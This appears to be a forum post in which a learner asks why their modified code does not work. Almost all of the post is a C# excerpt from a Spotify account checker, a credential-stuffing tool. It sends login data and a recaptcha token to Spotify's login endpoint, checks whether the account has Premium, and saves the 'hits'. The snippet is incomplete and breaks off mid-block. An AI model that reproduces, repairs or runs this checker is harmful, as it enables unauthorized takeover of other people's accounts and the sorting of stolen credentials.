Don't judge me strictly. I'm just learningIn the next topic, I took the source, and tried to change the authorization data, which did not work there. But nothing worked out for me. But why ?
Show ContentSpoiler:
req.AddHeader("Accept", "application/json, text/plain, */*");
req.Referer = "https://accounts.spotify.com/ru/login?continue=https:%2F%2Fopen.spotify.com%2F";
string login = req.Post("https://accounts.spotify.com/login/password", string.Concat(new string[]
{
"remember=true&continue=",
WebUtility.UrlEncode(array[0]),
"&recaptchaToken=",
WebUtility.UrlEncode(array[1]),
"&username=",
}), "application/x-www-form-urlencoded").ToString();
if (login.Contains("displayName"))
{
HttpResponse httpResponse3 = req.Get("https://www.spotify.com/us/account/overview/", null);
string account = httpResponse3.ToString();
if (account.Contains("Spotify Premium"))
{
CheckerHelper.CPM_aux++;
CheckerHelper.check++;
CheckerHelper.hits++;
Colorful.Console.WriteLine("[PREMIUM] " + text, Color.Lime);
CheckerHelper.SaveData(text, "premium");
}
else
{
CheckerHelper.CPM_aux++;
CheckerHelper.check++;
CheckerHelper.bad++;
Colorful.Console.WriteLine("[BAD] " + text, Color.DarkRed);
}